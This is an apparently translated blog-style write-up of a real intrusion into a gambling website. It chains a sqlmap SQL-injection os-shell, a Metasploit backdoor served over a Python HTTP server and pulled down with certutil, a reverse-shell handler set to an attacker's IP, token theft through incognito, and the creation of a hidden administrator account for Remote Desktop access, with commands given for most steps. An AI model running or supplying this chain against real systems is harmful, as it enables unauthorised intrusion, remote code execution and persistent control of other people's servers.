Title: A privilege escalation on an illegal website

0x01 Information Gathering

Because I mainly wanted to practise SQL injection, the information gathering was fairly brief:

Search for the relevant CMS on FOFA; here I found a SQL injection vulnerability in the admin login of a chess-and-card (gambling) platform.


0x02 Exploitation

1. Run sqlmap straight through and get an os-shell


2. Use Python to start a simple HTTP server and serve the backdoor file generated with MSF

python -m SimpleHTTPServer


3. Download and run the backdoor on the target from os-shell

First create a directory under os-shell:

mkdir C:\test

Then, still under os-shell, download the backdoor file to the server with the certutil command.

4. Run the MSF handler to catch the reverse shell

use exploit/multi/handler

set lhost <attacker IP that will receive the reverse shell>

run


5. Shell on the server obtained

At this point we found that we only had Guest permissions.

6. Escalate privileges on the target server

Escalation methods: kernel exploits, or stealing an administrator's token

This post only uses token theft to escalate.

Run load incognito (older builds use use incognito) to load the token module,

then list_tokens -u to list the user tokens, and impersonate_token with the administrator's token to take on that identity.


7. Create a user

Command: net user <username> <password> /add, then net localgroup administrators <username> /add to put the new account in the Administrators group


0x03 Penetration Summary

1. Obtain an os-shell through sqlmap.
2. Generate the backdoor file with MSF.
3. Start an HTTP server with python -m SimpleHTTPServer and copy the generated backdoor into its directory.
4. From os-shell, create a directory and download the backdoor from the HTTP server with certutil.
5. Catch the reverse shell with MSF.
6. Under MSF, add a user, add it to the Administrators group, and log in over Remote Desktop.
